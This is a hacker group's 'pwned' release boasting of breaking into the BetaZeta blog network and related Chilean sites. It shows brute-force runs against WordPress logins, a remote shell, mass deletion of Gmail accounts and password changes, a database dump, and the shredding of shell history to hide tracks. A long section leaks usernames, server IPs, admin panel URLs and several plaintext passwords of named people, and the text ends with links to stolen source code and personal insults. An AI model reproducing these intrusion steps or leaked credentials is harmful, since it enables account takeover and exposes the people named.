|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
___________ .___.____ __
\_ _____/ _ \ | | | ________ _____/ |______
| __)/ /_\ \| | | \___ // __ \ __\__ \
| \/ | \ | |___ / /\ ___/| | / __ \_
\___ /\____|__ /___|_______ \/_____ \\___ >__| (____ /
\/ \/ \/ \/ \/ \/
[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||
/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta -- thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology... so lets see!
*/
]====== 0x00 ======[ Index
[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrussion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras
-------------------------------------------------------------------------------
]====== 0x01 =======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0x02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have a weak security, if you store all your accounts in your mail
* you hace a weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enought to
* been brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* theirs servers were totally open for us (open legs?).
*/
-------------------------------------------------------------------------------
]====== 0x03 ======[ Intrussion
/* Hey ho, lets GO! */
(=| proof-of-concept |=)
/* First get get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
....................... FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user='leo prieto' http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
................................................................................
.................................................. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$
/* Done. Now, search a prompt: */
[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218...
Connected to fayerwayer.com.
Escape character is '^]'.
bash$
/* Now we can try with anything... say... gmail: */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: HuJucF53
/* Heh! Now lets play with Leo Prieto's stuff (again... same password almost
* for everything) */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$
-------------------------------------------------------------------------------
]====== 0x04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: ********
user: march3lo pass: marcel
user: mr_self-destruct pass: ********
user: mr_self-destruct pass: ********
user: sir_lestat pass: ********
user: asdsadfsadf pass: ********
user: Chok pass: ********
user: successor pass: ********
/* Amazing .... */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$
/* Awesome! For each domain we repeat */
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {
var $default = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'betaman', /* look at this! */
'password' => '********',
'database' => 'betaid_main',
'encoding'=> 'UTF8',
'prefix' => '',
);
var $test = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'user',
'password' => '********',
'database' => 'test_database_name',
'prefix' => '',
);
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */
betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org "rm -rf httpdocs/betaz.sql && shred .bash_history"
Password:
[1nf3ct3d@darkside:~]$
/* Its time to infect betaid to obtain all data!. We modify controller/auth_controller.php and pump it up */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: ********
user: chokolat pass: ********
user: andru pass: ********
user: angrod pass: ********
user: elmono pass: ********
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin's pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$
-------------------------------------------------------------------------------
]====== 0x05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
twitter.com:fayerwayer:f4y3rw4y3rdoesthisshit4realz
vimeo.com:fw@fayerwayer.com:gatoinalambrico
ZeroZen:
mail.google.com/a/zetacorp.net:zerozen:rtr944a5
gmail.com:zeroblogger:rtr944a5
www.google.com/a/betazeta.com:zerozen:rtr944a4
Mail:Pass
jf@betazeta.com:********
leo@betazeta.com:********
http://wayerless.com
user:sebastian pass: ********
user:rodrigo pass: ********
user:juaqion pass: ********
user: rodrigo pass: ********
user: admin pass: ********
user: frajola pass: ********
FayerWayer:
user: rodrigo pass: ********
user: admin pass:********
user: frajola pass:********
user: JF10 pass:********
user: sebastian pass:********
user: carlos pass:********
user: Amenadiel pass:********
user: hugo pass:********
user: admin pass:********
user: i2b pass:********
user: diego pass:********
user: leo prieto pass:********
user: diego pass:********
user: Diego pass:********
user: diego pass:********
user: ZeroZen pass:********
user: carlos pass:********
user: Ultraviolet pass:********
user: FelipeLang pass:********
user: Ultraviolet pass:********
user: eft0 pass:********
user: eft0@zetacorp pass:********
DB user fayerwayer
DB pass MysqlFayerwayer80
user: mr.chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: Boxbyte pass:********
user: admin pass:********
user: leoprieto@gmail.com pass: ********
URL: http://69.89.21.73:2082/frontend/bluehost/index.html
user: itwobcl
pass: ********
FTP
IP: 69.89.21.73
User: itwobcl
Pass: ********
---
Jabber
User: esteban@hs.i2b.cl
Pass: ********
Mail
SMTP: smtp.i2b.cl
Port: 587
POP: pop.i2b.cl
Port: 110
User and account: esteban.fernandez@i2b.cl
Pass: ********
---
Customer #: 18766006
Simple Control Panel
URL: https://72.167.52.30:9999
User: zetacorp
Pass: ********
phpmyadmin
URL: http://72.167.52.30/phpMyAdmin
User: root
Pass: ********
SSH
IP: 72.167.52.30
User: zetacorp
Pass: ********
Admin WP
http://www.fayerwayer.com/wp-admin
User: admin
Pass: ********
Admin Limesurvey
http://www.fayerwayer.com/limesurvey/admin
User: admin
Pass: ********
MySQL
User: root
Pass: ********
Backup
IP: 208.109.188.17
User: zetacorp
Pass: ********
PIX
https://72.167.52.79/
User: zetacorp
Pass: ********
ftp FW
Host: fayerwayer.i2b.cl
User: fayerwayer
Pass: ********
i2b
URL: www.bluehost.com
User: i2b.cl
Pass: ********
FTP ablog.i2b.cl
Host: 69.89.21.73
User: itwobcl
Pass: ********
Root Blog: /public_html/blog/
http://www.betazeta.com/wp-admin/
User: admin
Pass: ********
zimio.com (SCP)
User: zimio
Pass: ********
betazeta.com
FTP
User: betazeta
Pass: ********
wayerless.com
FTP
User: wayerless
Pass: ********
zetacorp.net
FTP
User: zetacorp
Pass: ********
Plesk
URL: https://64.13.250.71:8443
Username:admin
Password:********
SSH
Host: saborizante.com
User: efernadez
Pass: ********
Root
Pass: ********
Sites
Path: /var/www/vhosts/dominio
User name: eft0
Password : ********
http://betazetanet.seework.com
http://devwayerles.i2b.cl
Username: admin
Password: ********
BetaID
user: lpinto pass: ********
user: perovi pass: ********
user: nestorcarrasco pass: ********
user: volkova pass: ********
user: melkorazo pass: ********
user: melkorazo pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: gagoner pass: ********
user: claudiomix pass: ********
user: Vidal pass: ********
user: vidal pass: ********
user: lorena pass: ********
user: Polin pass: ********
user: derangedwolf pass: ********
user: darkoy pass: ********
user: darkjano pass: ********
user: hetnet pass: ********
user: hetnet pass: ********
user: nivyii pass: ********
user: nivyii pass: ********
user: serroba pass: ********
user: don juan pass: ********
user: donjuan pass: ********
user: grouchomarx pass: ********
user: grouchomarx pass: ********
user: Evadix pass: ********
user: doruku pass: ********
user: neuroshark pass: ********
user: neuroshark pass: ********
user: andyolivares pass: ********
user: andyolivares pass: ********
user: firexcool pass: ********
user: noquierouser pass: ********
user: Ecodrive pass: ********
user: ecodrive pass: ********
user: masteralfe pass: ********
user: Juako pass: ********
user: talkover pass: ********
user: davidqs pass: ********
user: Thefx pass: ********
user: thefx pass: ********
user: sprite pass: ********
user: nachx00 pass: ********
user: nachx00 pass: ********
user: pass: ********
user: vagrant pass: ********
user: forbidden pass: ********
user: payazo pass: ********
user: mescalier pass: ********
user: ruffox pass: ********
user: khalebd pass: ********
user: fako85 pass: ********
user: patus pass: ********
user: jorge pass: ********
user: dsalgado pass: ********
user: joseph pass: ********
user: joseph pass: ********
user: manuel pass: ********
user: suikakuyu pass: ********
user: suikakuyu pass: ********
user: eduardo pass: ********
user: paz pass: ********
user: paz pass: ********
user: dickinsonh2k pass: ********
user: clarkxp pass: ********
user: laura pass: ********
user: Marmota pass: ********
user: zirex pass: ********
user: chinito46 pass: ********
user: lukas pass: ********
user: lukas pass: ********
user: Esperpento pass: ********
user: rvs pass: ********
user: davdor pass: ********
user: kmepartaunrayo pass: ********
user: hiroki pass: ********
user: jf10 pass: ********
user: ail pass: ********
user: JanoMac pass: ********
user: eldarberserker pass: ********
user: Nanolethal pass: ********
user: necrox pass: ********
user: rkstro pass: ********
user: Elias pass: ********
user: antony pass: ********+
user: turbomaster pass: ********
user: turbomaster pass: ********
user: turbomaster pass: ********
user: Foxtrot pass: ********
user: vortex pass: ********
user: vortex pass: ********
user: francofa pass: ********
user: saint pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: infositio pass: ********
user: camilo_dxmg@live pass: ********
user: zector pass: ********
user: chokolat pass: ********
user: andru pass: ********
user: angrod pass: ********
user: elmono pass: ********
-------------------------------------------------------------------------------
]====== 0x06 ======[ Extras
/* Do you remember when CHW was erradicated?
* Oh wait. Remember bootlog too? ;-)
* -- That's was the OPPORTUNITY which BetaZeta has to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*/
/* Dud3s! Y0u've been pwn3d by teletubbies! */
EOF
